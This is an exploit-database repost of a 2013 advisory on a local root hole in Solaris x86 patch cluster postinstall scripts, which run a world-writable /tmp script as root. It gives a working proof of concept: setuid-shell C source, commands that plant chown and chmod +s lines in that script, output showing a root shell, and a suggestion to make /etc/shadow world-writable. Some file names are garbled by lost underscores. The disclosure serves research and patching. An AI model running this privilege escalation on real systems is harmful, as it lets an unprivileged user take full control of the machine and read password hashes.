###########################

# Solaris Recommended Patch Cluster 6/19 local root on x86

###########################

Hi, I don't think I ever sent this to the list.


Title: Solaris Recommended Patch Cluster 6/19 local root on x86

Date: 7/3/2013
Author: Larry W. Cashdollar, @_larry0

CVE: 2010-1183

If the system administrator is updating the system using update manager or smpatch (multi user mode) a local user could

execute commands as root. This only affects x86 systems as this code resides under a case statement checking that the
platform is intel based.

Local root:

Write to /tmp/diskette_rc.d/rcs9.sh before execution and you can execute commands as root.

./144751-01/SUNWos86r/install/postinstall

782 if [ -s /tmp/diskette
rc.d/rcs9.sh ]
783 then
784 /sbin/sh /tmp/diskette
rc.d/rcs9.sh "post"
785 fi

Inject entries into driver_aliases, research config file? maybe we can load our own library/driver?

804 # Remove erroneous entry for Symbios Logic 53c875/95 (ncrs)
805 TMPFILE=/tmp/ncrs
tmp
806 sed -e '/^ncrs "pci1000,1000"$/d' ${BASEDIR}/etc/driver
aliases >$TMPFIL
E
807 cp $TMPFILE ${BASEDIR}/etc/driver_aliases

./141445-09/SUNWos86r/install/postinstall

656 if [ -s /tmp/disketterc.d/rcs9.sh ]
657 then
658 /sbin/sh /tmp/diskette
rc.d/rcs9.sh "post"
659 fi

Well, it looks like you've got a few chances to abuse it:

larry () slowaris:~/10x86
Recommended/patches$ find . -name "*install" -type f -exec grep -l "/sbin/sh
/tmp/diskette_rc.d/rcs9.sh" {} \;
./144501-19/SUNWos86r/install/postinstall
./141445-09/SUNWos86r/install/postinstall
./142059-01/SUNWos86r/install/postinstall
./147148-26/SUNWos86r/install/postinstall
./127128-11/SUNWos86r/install/postinstall
./148889-03/SUNWos86r/install/postinstall
./142910-17/SUNWos86r/install/postinstall
./144751-01/SUNWos86r/install/postnatal

Psuedo PoC:

Depending on how rcs9.sh is created, we can either write to it repeatedly or just create the file initially with our
malicious entry.

chmod 666 /etc/shadow would be easy.

PoC:

larry () slowaris:~$ cat setuid.c
#include
#include
int
main (void)
{
char *shell[2];
shell[0] = "sh";
shell[1] = NULL;
setregid (0, 0);
setreuid (0, 0);
execve ("/bin/sh", shell, NULL);
return(0);
}

gcc -o /tmp/r00t setuid.c

larry () slowaris:~$ cat /tmp/diskette_rc.d/rcs9.sh chown root:root /tmp/r00t chmod +s /tmp/r00t

After patches have been applied:

larry () slowaris:~$ /tmp/r00t

# id
uid=0(root) gid=0(root)


Advisory: http://www.vapid.dhs.org/advisories/solaris-patch-cluster-x86root.html

###########################

# Iranian Exploit DataBase = http://IeDb.Ir [2013-12-17]

###########################